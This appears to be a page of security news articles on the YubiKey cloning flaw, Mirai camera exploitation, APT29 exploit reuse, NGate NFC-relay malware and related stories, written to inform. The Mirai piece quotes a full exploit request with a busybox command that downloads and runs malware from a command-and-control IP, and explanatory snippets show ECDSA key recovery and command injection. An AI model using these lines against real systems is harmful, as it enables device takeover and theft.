Security


YubiKeys are vulnerable to cloning attacks thanks to newly discovered side channel

ATTACK OF THE CLONES —

Sophisticated attack breaks security assurances of the most popular FIDO key.


The YubiKey 5, the most widely used hardware token for two-factor authentication based on the FIDO standard, contains a cryptographic flaw that makes the finger-size device vulnerable to cloning when an attacker gains brief physical access to it, researchers said Tuesday.

The cryptographic flaw, known as a side channel, resides in a small microcontroller used in a large number of other authentication devices, including smartcards used in banking, in electronic passports, and for entry to secure areas. While the researchers have confirmed that all YubiKey 5 series models can be cloned, they haven't tested other devices built on the same microcontroller, the Infineon SLE78, or on its successors, the Infineon Optiga Trust M and the Infineon Optiga TPM. The researchers suspect that any device using any of these three microcontrollers together with the Infineon cryptographic library contains the same vulnerability.

Patching not possible

YubiKey-maker Yubico issued an advisory in coordination with a detailed disclosure report from NinjaLab, the security firm that reverse-engineered the YubiKey 5 series and devised the cloning attack. All YubiKeys running firmware prior to version 5.7—which was released in May and replaces the Infineon cryptolibrary with a custom one—are vulnerable. Updating key firmware on the YubiKey isn’t possible. That leaves all affected YubiKeys permanently vulnerable.

“An attacker could exploit this issue as part of a sophisticated and targeted attack to recover affected private keys,” the advisory confirmed. “The attacker would need physical possession of the YubiKey, Security Key, or YubiHSM, knowledge of the accounts they want to target and specialized equipment to perform the necessary attack. Depending on the use case, the attacker may also require additional knowledge including username, PIN, account password, or authentication key.”

Side channels are clues left in physical manifestations, such as electromagnetic emanations, data caches, or the time required to complete a task, that leak cryptographic secrets. In this case, the side channel is the amount of time taken during a mathematical calculation known as a modular inversion. The Infineon cryptolibrary failed to implement a common side-channel defense known as constant time when performing modular inversion operations in the Elliptic Curve Digital Signature Algorithm (ECDSA). Constant-time coding ensures that the time a sensitive cryptographic operation takes to execute is uniform rather than varying with the specific keys being processed.

More precisely, the side channel is located in the Infineon implementation of the Extended Euclidean Algorithm, a method for, among other things, computing the modular inverse. By using an oscilloscope to measure the electromagnetic radiation while the token is authenticating itself, the researchers can detect tiny execution time differences that reveal a token’s ephemeral ECDSA key, also known as a nonce. Further analysis allows the researchers to extract the secret ECDSA key that underpins the entire security of the token.
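The leak is easiest to see in code. Below is a minimal Python sketch of the textbook extended Euclidean algorithm; it is illustrative only (Infineon's implementation is proprietary), but it shows why the operation is hard to make constant time: the number of division steps, and hence the running time, depends on the value being inverted.

```python
# Textbook extended Euclidean algorithm: computes k^-1 mod n while counting
# division steps. The step count varies with k, so execution time is
# key-dependent -- exactly the class of leak constant-time code eliminates.
def eea_invert(k, n):
    old_r, r = k, n      # remainders
    old_s, s = 1, 0      # Bezout coefficient tracking k's inverse
    steps = 0
    while r != 0:
        q = old_r // r
        old_r, r = r, old_r - q * r
        old_s, s = s, old_s - q * s
        steps += 1
    return old_s % n, steps

# Order of the NIST P-256 curve commonly used with ECDSA
n = 0xFFFFFFFF00000000FFFFFFFFFFFFFFFFBCE6FAADA7179E84F3B9CAC2FC632551

inv_a, steps_a = eea_invert(2, n)
inv_b, steps_b = eea_invert(0x1234567890ABCDEF1234567890ABCDEF, n)
assert (2 * inv_a) % n == 1
assert (0x1234567890ABCDEF1234567890ABCDEF * inv_b) % n == 1
print(steps_a, steps_b)  # different step counts for different nonces
```

On hardware, those differing step counts show up as small execution-time differences in the electromagnetic trace, which is the signal the researchers measured with an oscilloscope.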

In Tuesday’s report, NinjaLab co-founder Thomas Roche wrote:

In the present work, NinjaLab unveils a new side-channel vulnerability in the ECDSA implementation of Infineon on any security microcontroller family of the manufacturer. This vulnerability lies in the ECDSA ephemeral key (or nonce) modular inversion, and, more precisely, in the Infineon implementation of the Extended Euclidean Algorithm (EEA for short). To our knowledge, this is the first time an implementation of the EEA is shown to be vulnerable to side-channel analysis (contrarily to the EEA binary version). The exploitation of this vulnerability is demonstrated through realistic experiments, and we show that an adversary only needs to have access to the device for a few minutes. The offline phase took us about 24 hours; with more engineering work in the attack development, it would take less than one hour.

After a long phase of understanding the Infineon implementation through side-channel analysis on a Feitian open JavaCard smartcard, the attack is tested on a YubiKey 5Ci, a FIDO hardware token from Yubico. All YubiKey 5 Series (before the firmware update 5.7 of May 6th, 2024) are affected by the attack. In fact, all products relying on the ECDSA of the Infineon cryptographic library running on an Infineon security microcontroller are affected by the attack. We estimate that the vulnerability has existed for more than 14 years in Infineon top secure chips. These chips and the vulnerable part of the cryptographic library went through about 80 CC certification evaluations of level AVA VAN 4 (for TPMs) or AVA VAN 5 (for the others) from 2010 to 2024 (and a bit less than 30 certificate maintenances).
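The final key-extraction step follows from standard ECDSA algebra: a signature (r, s) on a message hash h satisfies s = k⁻¹(h + r·d) mod n, so anyone who learns the per-signature nonce k can solve directly for the long-term private key d. A minimal sketch of that algebra (the values are arbitrary stand-ins, and r is treated as a plain number rather than the x-coordinate of k·G, since only the modular arithmetic matters here):

```python
# Recovering an ECDSA private key d from a single signature once the nonce k
# is known: d = (s*k - h) * r^-1 mod n. All values below are stand-ins.
n = 0xFFFFFFFF00000000FFFFFFFFFFFFFFFFBCE6FAADA7179E84F3B9CAC2FC632551  # P-256 order

d = 0x1CEB00DA   # long-term private key (what the attacker wants)
k = 0x0DDBA11    # ephemeral nonce (what the side channel leaks)
h = 0xFACADE     # message hash
r = 0xC0FFEE     # stand-in for the signature's r component

# Signing: s = k^-1 * (h + r*d) mod n
s = (pow(k, -1, n) * (h + r * d)) % n

# Recovery from (r, s, h) plus the leaked nonce k
recovered = ((s * k - h) * pow(r, -1, n)) % n
assert recovered == d
```

This is why ECDSA nonces must stay secret and unbiased: leaking even one of them through a timing channel hands over the signing key itself.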



City of Columbus sues man after he discloses severity of ransomware attack

WHISTLEBLOWER IN LEGAL CROSSHAIRS —

Mayor said data was unusable to criminals; researcher proved otherwise.


A judge in Ohio has issued a temporary restraining order against a security researcher who presented evidence that a recent ransomware attack on the city of Columbus scooped up reams of sensitive personal information, contradicting claims made by city officials.

The order, issued by a judge in Ohio’s Franklin County, came after the city of Columbus fell victim to a ransomware attack on July 18 that siphoned 6.5 terabytes of the city’s data. A ransomware group known as Rhysida took credit for the attack and offered to auction off the data with a starting bid of about $1.7 million in bitcoin. On August 8, after the auction failed to find a bidder, Rhysida released what it said was about 45 percent of the stolen data on the group’s dark web site, which is accessible to anyone with a Tor browser.

Dark web not readily available to public—really?

Columbus Mayor Andrew Ginther said on August 13 that a “breakthrough” in the city’s forensic investigation of the breach found that the sensitive files Rhysida obtained were either encrypted or corrupted, making them “unusable” to the thieves. Ginther went on to say the data’s lack of integrity was likely the reason the ransomware group had been unable to auction off the data.

Shortly after Ginther made his remarks, security researcher David Leroy Ross contacted local news outlets and presented evidence that showed the data Rhysida published was fully intact and contained highly sensitive information regarding city employees and residents. Ross, who uses the alias Connor Goodwolf, presented screenshots and other data that showed the files Rhysida had posted included names from domestic violence cases and Social Security numbers for police officers and crime victims. Some of the data spanned years.

On Thursday, the city of Columbus sued Ross, alleging damages for criminal acts, invasion of privacy, negligence, and civil conversion. The lawsuit claimed that downloading documents from a dark web site run by ransomware attackers amounted to him “interacting” with them and required special expertise and tools. The suit went on to challenge Ross’s decision to alert reporters to the information, which it claimed would not be easily obtained by others.

“Only individuals willing to navigate and interact with the criminal element on the dark web, who also have the computer expertise and tools necessary to download data from the dark web, would be able to do so,” city attorneys wrote. “The dark web-posted data is not readily available for public consumption. Defendant is making it so.”

The same day, a Franklin County judge granted the city’s motion for a temporary restraining order against Ross. It bars the researcher “from accessing, and/or downloading, and/or disseminating” any city files that were posted to the dark web. The motion was made and granted “ex parte,” meaning it was issued without Ross being informed of it or given an opportunity to present his case.

In a press conference Thursday, Columbus City Attorney Zach Klein defended his decision to sue Ross and obtain the restraining order.

“This is not about freedom of speech or whistleblowing,” he said. “This is about the downloading and disclosure of stolen criminal investigatory records. This effect is to get [Ross] to stop downloading and disclosing stolen criminal records to protect public safety.”

The Columbus city attorney’s office didn’t respond to questions sent by email. It did provide the following statement:

The lawsuit filed by the City of Columbus pertains to stolen data that Mr. Ross downloaded from the dark web to his own, local device and disseminated to the media. In fact, several outlets used the stolen data provided by Ross to go door-to-door and contact individuals using names and addresses contained within the stolen data. As has now been extensively reported, Mr. Ross also showed multiple news outlets stolen, confidential data belonging to the City which he claims reveal the identities of undercover police officers and crime victims as well as evidence from active criminal investigations. Sharing this stolen data threatens public safety and the integrity of the investigations. The temporary restraining order granted by the Court prohibits Mr. Ross from disseminating any of the City’s stolen data. Mr. Ross is still free to speak about the cyber incident and even describe what kind of data is on the dark web—he just cannot disseminate that data.

Attempts to reach Ross for comment were unsuccessful. Email sent to the Columbus mayor’s office went unanswered.

A screenshot showing the Rhysida dark web site.

As shown above in the screenshot of the Rhysida dark web site on Friday morning, the sensitive data remains available to anyone who looks for it. Friday’s order may bar Ross from accessing the data or disseminating it to reporters, but it has no effect on those who plan to use the data for malicious purposes.



Commercial spyware vendor exploits used by Kremlin-backed hackers, Google says

MERCHANTS OF HACKING —

Findings undercut pledges by NSO Group and Intellexa that their wares won’t be abused.


Critics of spyware and exploit sellers have long warned that the advanced hacking sold by commercial surveillance vendors (CSVs) represents a worldwide danger because they inevitably find their way into the hands of malicious parties, even when the CSVs promise they will be used only to target known criminals. On Thursday, Google analysts presented evidence bolstering the critique after finding that spies working on behalf of the Kremlin used exploits that are “identical or strikingly similar” to those sold by spyware makers Intellexa and NSO Group.

The hacking outfit, tracked under names including APT29, Cozy Bear, and Midnight Blizzard, is widely assessed to work on behalf of Russia’s Foreign Intelligence Service, or the SVR. Researchers with Google’s Threat Analysis Group, which tracks nation-state hacking, said Thursday that they observed APT29 using exploits identical or strikingly similar to those first used by commercial exploit sellers NSO Group of Israel and Intellexa of Ireland. In both cases, the CSVs’ exploits were first used as zero-days, meaning when the vulnerabilities weren’t publicly known and no patch was available.

Identical or strikingly similar

Once patches became available for the vulnerabilities, TAG said, APT29 used the exploits in watering hole attacks, which infect targets by surreptitiously planting exploits on sites they’re known to frequent. TAG said APT29 used the exploits as n-days, which target vulnerabilities that have recently been fixed but not yet widely installed by users.

“In each iteration of the watering hole campaigns, the attackers used exploits that were identical or strikingly similar to exploits from CSVs, Intellexa, and NSO Group,” TAG’s Clement Lecigne wrote. “We do not know how the attackers acquired these exploits. What is clear is that APT actors are using n-day exploits that were originally used as 0-days by CSVs.”

In one case, Lecigne said, TAG observed APT29 compromising the Mongolian government sites mfa.gov[.]mn and cabinet.gov[.]mn and planting a link that loaded code exploiting CVE-2023-41993, a critical flaw in the WebKit browser engine. The Russian operatives used the vulnerability, loaded onto the sites in November, to steal browser cookies for accessing online accounts of targets they hoped to compromise. The Google analyst said that the APT29 exploit “used the exact same trigger” as an exploit Intellexa used in September 2023, before CVE-2023-41993 had been fixed.

Lecigne provided the following image showing a side-by-side comparison of the code used in each attack.

A side-by-side comparison of code used by APT29 in November 2023 and Intellexa in September of that year. (Credit: Google TAG)

APT29 used the same exploit again in February of this year in a watering hole attack on the Mongolian government website mga.gov[.]mn.

In July 2024, APT29 planted a new cookie-stealing attack on mga.gov[.]mn. It exploited CVE-2024-5274 and CVE-2024-4671, two n-day vulnerabilities in Google Chrome. Lecigne said APT29’s CVE-2024-5274 exploit was a slightly modified version of one NSO Group used in May 2024, when the vulnerability was still a zero-day. The exploit for CVE-2024-4671, meanwhile, contained many similarities to an exploit for CVE-2021-37973 that Intellexa had previously used to evade Chrome sandbox protections.

The timeline of the attacks is illustrated below:

[Timeline image credit: Google TAG]

As noted earlier, it’s unclear how APT29 would have obtained the exploits. Possibilities include: malicious insiders at the CSVs or brokers who worked with the CSVs, hacks that stole the code, or outright purchases. Both companies defend their business by promising to sell exploits only to governments of countries deemed to have good world standing. The evidence unearthed by TAG suggests that despite those assurances, the exploits are finding their way into the hands of government-backed hacking groups.

“While we are uncertain how suspected APT29 actors acquired these exploits, our research underscores the extent to which exploits first developed by the commercial surveillance industry are proliferated to dangerous threat actors,” Lecigne wrote.



Unpatchable 0-day in surveillance cam is being exploited to install Mirai

MIRAI STRIKES AGAIN —

Vulnerability is easy to exploit and allows attackers to remotely execute commands.


Malicious hackers are exploiting a critical vulnerability in a widely used security camera to spread Mirai, a family of malware that wrangles infected Internet of Things devices into large networks for use in attacks that take down websites and other Internet-connected devices.

The attacks target the AVM1203, a surveillance device from Taiwan-based manufacturer AVTECH, network security provider Akamai said Wednesday. Unknown attackers have been exploiting a 5-year-old vulnerability since March. The zero-day vulnerability, tracked as CVE-2024-7029, is easy to exploit and allows attackers to execute malicious code. The AVM1203 is no longer sold or supported, so no update is available to fix the critical zero-day.

That time a ragtag army shook the Internet

Akamai said that the attackers are exploiting the vulnerability so they can install a variant of Mirai, which arrived in September 2016 when a botnet of infected devices took down cybersecurity news site Krebs on Security. Mirai contained functionality that allowed a ragtag army of compromised webcams, routers, and other types of IoT devices to wage distributed denial-of-service attacks of record-setting sizes. In the weeks that followed, the Mirai botnet delivered similar attacks on Internet service providers and other targets. One such attack, against dynamic domain name provider Dyn, paralyzed vast swaths of the Internet.

Complicating attempts to contain Mirai, its creators released the malware to the public, a move that allowed virtually anyone to create their own botnets that delivered DDoSes of once-unimaginable size.

Kyle Lefton, a security researcher with Akamai’s Security Intelligence and Response Team, said in an email that the team has observed the threat actor behind the attacks perform DDoS attacks against “various organizations,” which he didn’t name or describe further. So far, the team hasn’t seen any indication that the threat actors are monitoring video feeds or using the infected cameras for other purposes.

Akamai detected the activity using a “honeypot” of devices that mimic the cameras on the open Internet to observe any attacks that target them. The technique doesn’t allow the researchers to measure the botnet’s size. The US Cybersecurity and Infrastructure Security Agency warned of the vulnerability earlier this month.
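The honeypot technique itself is simple in principle: expose a listener that resembles the real service, record whatever scanners send, and never act on any of it. The sketch below is a bare-bones, loopback-only illustration of that idea (Akamai's production honeypots emulate the camera's actual HTTP interface and operate at far larger scale):

```python
# Minimal single-connection honeypot: logs the peer address and the raw bytes
# of the first request, then shuts down. Nothing received is ever executed.
import socket
import threading

def run_honeypot(hits, host="127.0.0.1"):
    srv = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
    srv.bind((host, 0))            # let the OS pick a free port
    srv.listen(1)
    port = srv.getsockname()[1]

    def serve():
        conn, addr = srv.accept()
        data = conn.recv(4096)     # record the probe as inert data
        hits.append((addr[0], data.decode(errors="replace")))
        conn.close()
        srv.close()

    t = threading.Thread(target=serve, daemon=True)
    t.start()
    return port, t

hits = []
port, t = run_honeypot(hits)

# Simulate a scanner probing the vulnerable AVTECH CGI path
c = socket.create_connection(("127.0.0.1", port))
c.sendall(b"GET /cgi-bin/supervisor/Factory.cgi HTTP/1.1\r\nHost: cam\r\n\r\n")
c.close()
t.join(timeout=5)
print(hits[0][1].splitlines()[0])  # first line of the captured probe
```

Because the honeypot only records incoming traffic, it reveals what exploit code attackers are spraying at the Internet, but, as the article notes, it cannot measure how many devices the resulting botnet actually controls.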

The technique, however, has allowed Akamai to capture the code used to compromise the devices. It targets a vulnerability that has been known since at least 2019 when exploit code became public. The zero-day resides in the “brightness argument in the ‘action=’ parameter” and allows for command injection, researchers wrote. The zero-day, discovered by Akamai researcher Aline Eliovich, wasn’t formally recognized until this month, with the publishing of CVE-2024-7029.
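The bug class behind CVE-2024-7029 is ordinary command injection: a request parameter is spliced into a shell command, so shell metacharacters inside it get executed. The Python sketch below is a hypothetical illustration of the pattern and its fix; AVTECH's firmware is closed source, so the function names and command here are invented, not the camera's actual code:

```python
# Command injection in miniature: the "vulnerable" handler builds a shell
# command by string concatenation, so $(...) in the input runs as a command.
import subprocess

def set_brightness_vulnerable(value):
    # BAD: attacker-controlled input reaches /bin/sh unquoted
    out = subprocess.run("echo brightness=" + value, shell=True,
                         capture_output=True, text=True)
    return out.stdout

def set_brightness_safe(value):
    # Fix: no shell at all; the argument is passed to echo as inert data
    out = subprocess.run(["echo", "brightness=" + value],
                         capture_output=True, text=True)
    return out.stdout

payload = "$(echo pwned)"
print(set_brightness_vulnerable(payload))  # substitution ran: brightness=pwned
print(set_brightness_safe(payload))        # literal: brightness=$(echo pwned)
```

In the real attack the injected command is not a harmless echo but a downloader for the Mirai payload, as the Akamai figures below show.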

Wednesday’s post went on to say:

How does it work?

This vulnerability was originally discovered by examining our honeypot logs. Figure 1 shows the decoded URL for clarity.

Fig. 1: Decoded payload body of the exploit attempts (Credit: Akamai)

The vulnerability lies in the brightness function within the file /cgi-bin/supervisor/Factory.cgi (Figure 2).

Fig. 2: PoC of the exploit (Credit: Akamai)

What could happen?

In the exploit examples we observed, essentially what happened is this: The exploit of this vulnerability allows an attacker to execute remote code on a target system.

Figure 3 is an example of a threat actor exploiting this flaw to download and run a JavaScript file to fetch and load their main malware payload. Similar to many other botnets, this one is also spreading a variant of Mirai malware to its targets.

Fig. 3: Strings from the JavaScript downloader (Credit: Akamai)

In this instance, the botnet is likely using the Corona Mirai variant, which has been referenced by other vendors as early as 2020 in relation to the COVID-19 virus.

Upon execution, the malware connects to a large number of hosts through Telnet on ports 23, 2323, and 37215. It also prints the string “Corona” to the console on an infected host (Figure 4).

Fig. 4: Execution of malware showing output to console (Credit: Akamai)

Static analysis of the strings in the malware samples shows targeting of the path /ctrlt/DeviceUpgrade_1 in an attempt to exploit Huawei devices affected by CVE-2017-17215. The samples have two hard-coded command and control IP addresses, one of which is part of the CVE-2017-17215 exploit code:

POST /ctrlt/DeviceUpgrade_1 HTTP/1.1
Content-Length: 430
Connection: keep-alive
Accept: */*
Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"

$(/bin/busybox wget -g 45.14.244[.]89 -l /tmp/mips -r /mips; /bin/busybox chmod 777 /tmp/mips; /tmp/mips huawei.rep)$(echo HUAWEIUPNP)

The botnet also targeted several other vulnerabilities including a Hadoop YARN RCE, CVE-2014-8361, and CVE-2017-17215. We have observed these vulnerabilities exploited in the wild several times, and they continue to be successful.

Given that this camera model is no longer supported, the best course of action for anyone using one is to replace it. As with all Internet-connected devices, IoT devices should never be accessible using the default credentials that shipped with them.



Shocker: French make surprise arrest of Telegram founder at Paris airport

quelle surprise —

Lack of moderation on Telegram claimed to be reason for arrest.

Pavel Durov, Telegram founder and former CEO of Vkontakte, in happier (and younger) days.

Late this afternoon at a Parisian airport, French authorities detained Pavel Durov, the founder of the Telegram messaging/publication service. They are allegedly planning to hit him tomorrow with serious charges related to abetting terrorism, fraud, money laundering, and crimes against children, all of it apparently stemming from a near-total lack of moderation on Telegram. According to French authorities, thanks to its encryption and support for crypto, Telegram has become the new top tool for organized crime.

The French outlet TF1 had the news first from sources within the investigation. (Reuters and CNN have since run stories as well.) Their source said, “Pavel Durov will definitely end up in pretrial detention. On his platform, he allowed an incalculable number of offenses and crimes to be committed, which he does nothing to moderate nor does he cooperate.”

Durov is a 39-year-old who gained a fortune by building VKontakte, a Russian version of Facebook, before being forced out of his company by the Kremlin. He left Russia and went on to start Telegram, which became widely popular, especially in Europe. He was arrested today when his private plane flew from Azerbaijan to Paris’s Le Bourget Airport.

Telegram has become a crucial news outlet for Russians, as it is one of the few uncensored ways to hear non-Kremlin propaganda from within Russia. It has also become the top outlet for nationalistic Russian “milbloggers” writing about the Ukraine war. Durov’s arrest has already led to outright panic among many of them, in part due to secrets it might reveal—but also because it is commonly used by Russian forces to communicate.

As Rob Lee, a senior fellow at the Foreign Policy Research Institute, noted tonight, “A popular Russian channel says that Telegram is also used by Russian forces to communicate, and that if Western intelligence services gain access to it, they could obtain sensitive information about the Russian military.”

Right-wing and crypto influencers are likewise angry over the arrest, writing things like, “This is a serious attack on freedom. Today, they target an app that promotes liberty; tomorrow, they will go after DeFi. If you claim to support crypto, you must show your support. #FreeDurov It’s time for digital resistance.”

Durov appears to be an old-school cyber-libertarian who believes in privacy and encryption. His arrest will certainly resonate in America, which has seen a similar debate over how much online services should cooperate with law enforcement. The FBI, for instance, has occasionally warned that end-to-end encryption will result in a “going dark” problem in which crime simply disappears from their view, and the US has seen repeated attempts to legislate backdoors into encryption systems. Those have all been defeated, however, and civil liberties advocates and techies generally note that creating backdoors makes such systems fundamentally insecure. The global debate over crime, encryption, civil liberties, and messaging apps is sure to heat up with Durov’s arrest.



Microsoft to host security summit after CrowdStrike disaster

Bugging out —

Redmond wants to improve the resilience of Windows to buggy software.


Microsoft is stepping up its plans to make Windows more resilient to buggy software after a botched CrowdStrike update took down millions of PCs and servers in a global IT outage.

The tech giant has in the past month intensified talks with partners about adapting the security procedures around its operating system to better withstand the kind of software error that crashed 8.5 million Windows devices on July 19.

Critics say that any changes by Microsoft would amount to a concession of shortcomings in Windows’ handling of third-party security software that could have been addressed sooner.

Yet they would also prove controversial among security vendors that would have to make radical changes to their products, and force many Microsoft customers to adapt their software.

Last month’s outages—which are estimated to have caused billions of dollars in damages after grounding thousands of flights and disrupting hospital appointments worldwide—heightened scrutiny from regulators and business leaders over the extent of access that third-party software vendors have to the core, or kernel, of Windows operating systems.

Microsoft will host a summit next month for government representatives and cyber security companies, including CrowdStrike, to “discuss concrete steps we will all take to improve security and resiliency for our joint customers,” Microsoft said on Friday.

The gathering will take place on September 10 at Microsoft’s headquarters near Seattle, it said in a blog post.

Bugs in the kernel can quickly crash an entire operating system, triggering the millions of “blue screens of death” that appeared around the globe after CrowdStrike’s faulty software update was sent out to clients’ devices.

Microsoft told the Financial Times it was considering several options to make its systems more stable and had not ruled out completely blocking access to the Windows kernel—an option some rivals fear would put their software at a disadvantage to the company’s internal security product, Microsoft Defender.

“All of the competitors are concerned that [Microsoft] will use this to prefer their own products over third-party alternatives,” said Ryan Kalember, head of cyber security strategy at Proofpoint.

Microsoft may also demand new testing procedures from cyber security vendors rather than adapting the Windows system itself.

Apple, which was not hit by the outages, blocks all third-party providers from accessing the kernel of its MacOS operating system, forcing them to operate in the more limited “user-mode.”

Microsoft has previously said it could not do the same, after coming to an understanding with the European Commission in 2009 that it would give third parties the same access to its systems as that for Microsoft Defender.

Some experts said, however, that this voluntary commitment to the EU had not tied Microsoft’s hands in the way it claimed, arguing that the company had always been free to make the changes now under consideration.

“These are technical decisions of Microsoft that were not part of [the arrangement],” said Thomas Graf, a partner at Cleary Gottlieb in Brussels who was involved in the case.

“The text [of the understanding] does not require them to give access to the kernel,” added AJ Grotto, a former senior director for cyber security policy at the White House.

Grotto said Microsoft shared some of the blame for the July disruption since the outages would not have been possible without its decision to allow access to the kernel.

Nevertheless, while it might boost a system’s resilience, blocking kernel access could also bring “real trade-offs” for the compatibility with other software that had made Windows so popular among business customers, Forrester analyst Allie Mellen said.

“That would be a fundamental shift for Microsoft’s philosophy and business model,” she added.

Operating exclusively outside the kernel may lower the risk of triggering mass outages but it was also “very limiting” for security vendors and could make their products “less effective” against hackers, Mellen added.

Operating within the kernel gave security companies more information about potential threats and enabled their defensive tools to activate before malware could take hold, she added.

An alternative option could be to replicate the model used by the open-source operating system Linux, which uses a filtering mechanism that creates a segregated environment within the kernel in which software, including cyber defense tools, can run.

But the complexity of overhauling how other security software works with Windows means that any changes will be hard for regulators to police and Microsoft will have strong incentives to favor its own products, rivals said.

It “sounds good on paper, but the devil is in the details,” said Matthew Prince, chief executive of digital services group Cloudflare.

© 2024 The Financial Times Ltd. All rights reserved. Not to be redistributed, copied, or modified in any way.



After cybersecurity lab wouldn’t use AV software, US accuses Georgia Tech of fraud


Dr. Emmanouil “Manos” Antonakakis runs a Georgia Tech cybersecurity lab and has attracted millions of dollars in the last few years from the US government for Department of Defense research projects like “Rhamnousia: Attributing Cyber Actors Through Tensor Decomposition and Novel Data Acquisition.”

The government yesterday sued Georgia Tech in federal court, singling out Antonakakis and claiming that neither he nor Georgia Tech followed basic (and required) security protocols for years, knew they were not in compliance with such protocols, and then submitted invoices for their DoD projects anyway. (Read the complaint.) The government claims this is fraud:

At bottom, DoD paid for military technology that Defendants stored in an environment that was not secure from unauthorized disclosure, and Defendants failed to even monitor for breaches so that they and DoD could be alerted if information was compromised. What DoD received for its funds was of diminished or no value, not the benefit of its bargain.

AV hate

Given the nature of his work for DoD, Antonakakis and his lab are required to abide by many sets of security rules, including those outlined in NIST Special Publication 800-171, “Protecting Controlled Unclassified Information in Nonfederal Information Systems and Organizations.”

One of the rules says that machines storing or accessing such “controlled unclassified information” need to have endpoint antivirus software installed. But according to the US government, Antonakakis really, really doesn’t like putting AV detection software on his lab’s machines.

Georgia Tech admins asked him to comply with the requirement, but according to an internal 2019 email, Antonakakis “wasn’t receptive to such a suggestion.” In a follow-up email, Antonakakis himself said that “endpoint [antivirus] agent is a nonstarter.”

According to the government, “Other than Dr. Antonakakis’s opposition, there was nothing preventing the lab from running antivirus protection. Dr. Antonakakis simply did not want to run it.”

The IT director for Antonakakis’ lab was allowed to use other “mitigating measures” instead, such as relying on the school’s firewall for additional security. The IT director said that he thought Georgia Tech ran antivirus scans from its network. However, this “assumption” turned out to be completely wrong; the school’s network “has never provided” antivirus protection and, even if it had, the lab used laptops that were regularly taken outside the network perimeter.

The school realized after some time that the lab was not in compliance with the DoD contract rules, so an administrator decided to “suspend invoicing” on the lab’s contracts so that the school would not be charged with filing false claims.

According to the government, “Within a few days of the invoicing for his contracts being suspended, Dr. Antonakakis relented on his years-long opposition to the installation of antivirus software in the Astrolavos Lab. Georgia Tech’s standard antivirus software was installed throughout the lab.”

But, says the government, the school never acknowledged that it had been out of compliance for some time and that it had filed numerous invoices while noncompliant. In the government’s telling, this is fraud.

After cybersecurity lab wouldn’t use AV software, US accuses Georgia Tech of fraud Read More »


Android malware steals payment card data using previously unseen technique

NEW ATTACK SCENARIO —

Attacker then emulates the card and makes withdrawals or payments from victim’s account.


Newly discovered Android malware steals payment card data using an infected device’s NFC reader and relays it to attackers, a novel technique that effectively clones the card so it can be used at ATMs or point-of-sale terminals, security firm ESET said.

ESET researchers have named the malware NGate because it incorporates NFCGate, an open source tool for capturing, analyzing, or altering NFC traffic. Short for Near-Field Communication, NFC is a protocol that allows two devices to wirelessly communicate over short distances.

New Android attack scenario

“This is a new Android attack scenario, and it is the first time we have seen Android malware with this capability being used in the wild,” ESET researcher Lukas Stefanko said in a video demonstrating the discovery. “NGate malware can relay NFC data from a victim’s card through a compromised device to an attacker’s smartphone, which is then able to emulate the card and withdraw money from an ATM.”

Lukas Stefanko—Unmasking NGate.

The malware was installed through traditional phishing scenarios, such as the attacker messaging targets and tricking them into installing NGate from short-lived domains that impersonated the banks or official mobile banking apps available on Google Play. Masquerading as a legitimate app for a target’s bank, NGate prompts the user to enter the banking client ID, date of birth, and the PIN code corresponding to the card. The app goes on to ask the user to turn on NFC and to scan the card.

ESET said it discovered NGate being used against three Czech banks starting in November and identified six separate NGate apps circulating between then and March of this year. Some of the apps used in later months of the campaign came in the form of PWAs, short for Progressive Web Apps, which, as reported Thursday, can be installed on both Android and iOS devices even when settings (mandatory on iOS) prevent the installation of apps from non-official sources.

The most likely reason the NGate campaign ended in March, ESET said, was the arrest by Czech police of a 22-year-old they said they caught wearing a mask while withdrawing money from ATMs in Prague. Investigators said the suspect had “devised a new way to con people out of money” using a scheme that sounds identical to the one involving NGate.

Stefanko and fellow ESET researcher Jakub Osmani explained how the attack worked:

The announcement by the Czech police revealed the attack scenario started with the attackers sending SMS messages to potential victims about a tax return, including a link to a phishing website impersonating banks. These links most likely led to malicious PWAs. Once the victim installed the app and inserted their credentials, the attacker gained access to the victim’s account. Then the attacker called the victim, pretending to be a bank employee. The victim was informed that their account had been compromised, likely due to the earlier text message. The attacker was actually telling the truth – the victim’s account was compromised, but this truth then led to another lie.

To “protect” their funds, the victim was requested to change their PIN and verify their banking card using a mobile app – NGate malware. A link to download NGate was sent via SMS. We suspect that within the NGate app, the victims would enter their old PIN to create a new one and place their card at the back of their smartphone to verify or apply the change.

Since the attacker already had access to the compromised account, they could change the withdrawal limits. If the NFC relay method didn’t work, they could simply transfer the funds to another account. However, using NGate makes it easier for the attacker to access the victim’s funds without leaving traces back to the attacker’s own bank account. A diagram of the attack sequence is shown in Figure 6.

NGate attack overview.

ESET

The researchers said NGate or apps similar to it could be used in other scenarios, such as cloning some smart cards used for other purposes. The attack would work by copying the unique ID of the NFC tag, abbreviated as UID.

“During our testing, we successfully relayed the UID from a MIFARE Classic 1K tag, which is typically used for public transport tickets, ID badges, membership or student cards, and similar use cases,” the researchers wrote. “Using NFCGate, it’s possible to perform an NFC relay attack to read an NFC token in one location and, in real time, access premises in a different location by emulating its UID, as shown in Figure 7.”

Figure 7. Android smartphone (right) that read and relayed an external NFC token’s UID to another device (left).

ESET

Cloning could occur in any situation where the attacker has physical access to a card or can briefly read one from an unattended purse, wallet, backpack, or smartphone case holding cards. Performing and emulating such attacks requires the attacker to have a rooted and customized Android device; the phones infected by NGate had no such requirement.
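The relay technique described above boils down to reading an identifier in one place and forwarding it, in real time, to a device that emulates it somewhere else. The following is a conceptual, hardware-free Python sketch of just the forwarding step over a local socket; it is not NFCGate’s actual implementation, and the UID is a made-up example:

```python
import socket
import threading

def emulator_side(server_sock, result):
    """Hypothetical 'attacker' end: receives a relayed UID and would
    present it to a reader via card emulation (omitted here)."""
    conn, _ = server_sock.accept()
    result["uid"] = conn.recv(16)  # MIFARE Classic 1K UIDs are 4 or 7 bytes
    conn.close()

def reader_side(port, uid):
    """Hypothetical 'victim' end: reads a tag's UID and forwards it."""
    with socket.create_connection(("127.0.0.1", port)) as s:
        s.sendall(uid)

# Simulate relaying a 4-byte UID between two endpoints on one machine.
server = socket.socket()
server.bind(("127.0.0.1", 0))
server.listen(1)
port = server.getsockname()[1]

result = {}
t = threading.Thread(target=emulator_side, args=(server, result))
t.start()
reader_side(port, b"\xde\xad\xbe\xef")  # example UID, not a real card
t.join()
server.close()
print(result["uid"].hex())  # deadbeef
```

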